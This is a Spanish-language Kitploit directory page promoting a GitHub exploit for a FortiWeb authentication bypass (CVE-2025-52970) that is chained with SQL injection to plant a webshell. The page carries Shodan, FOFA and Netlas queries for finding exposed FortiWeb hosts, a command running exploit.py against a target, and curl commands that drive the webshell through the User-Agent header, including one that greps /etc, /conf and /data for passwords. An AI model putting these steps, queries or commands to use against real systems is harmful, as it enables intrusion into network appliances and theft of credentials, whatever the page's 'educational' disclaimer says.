Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FortiWeb-CVE-2025-52970-Authentication-Bypass — Demuestra un bypass de autenticación en FortiWeb (CVE-2025-52970) encadenado con inyección SQL para subir un webshell y lograr ejecución remota de código a través de cabeceras HTTP. | Kitploit
Herramientas/GitHubGitHub/hex00-0x4/fortiweb-cve-2025-52970-authentication-bypass
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhex00-0x4/fortiweb-cve-2025-52970-authentication-bypass

FortiWeb-CVE-2025-52970-Authentication-Bypass

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Demuestra un bypass de autenticación en FortiWeb (CVE-2025-52970) encadenado con inyección SQL para subir un webshell y lograr ejecución remota de código a través de cabeceras HTTP.

Ver Repositorio
9313hace 1 añoAún no revisado

🚨 Bypass de Autenticación en FortiWeb → Ejecución Remota de Código

📌 Descripción General

Este repositorio demuestra un bypass de autenticación en FortiWeb que puede encadenarse para lograr Ejecución Remota de Código (RCE).
El exploit aprovecha un endpoint vulnerable para inyectar payloads SQL, subir una webshell y ejecutar comandos a través de cabeceras HTTP.

⚠️ Descargo de responsabilidad:
Este proyecto es solo con fines educativos y de investigación.
NO lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.

Netlas, FOFA y Shodan

Screenshot 2025-08-23 131226
root@kitploit:~
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443

🔎 Detalles de la Vulnerabilidad

  • CVE: CVE-2025-52970

  • Componente: FortiWeb Fabric API (/api/fabric/device/status)

  • Impacto: Bypass de autenticación → Inyección SQL → Subida de webshell → RCE

  • Vector: Cabecera Authorization manipulada + inyección SQL

🧑💻 Flujo del Exploit

  1. Eliminar y crear una tabla SQL temporal.

  2. Escribir el payload de la webshell en fragmentos.

  3. Exportar la shell a /cgi-bin/x.cgi.

  4. Subir el script Python auxiliar para activar los permisos.

  5. Acceder a la webshell enviando comandos a través de la cabecera User-Agent.

    ⚙️ Uso

1️⃣ Clonar el Repo

root@kitploit:~
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

Screenshot 2025-08-23 114753 Screenshot 2025-08-23 114915

3️⃣ Interactuar con la Webshell

root@kitploit:~
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
Screenshot 2025-08-23 114521
Descargar herramienta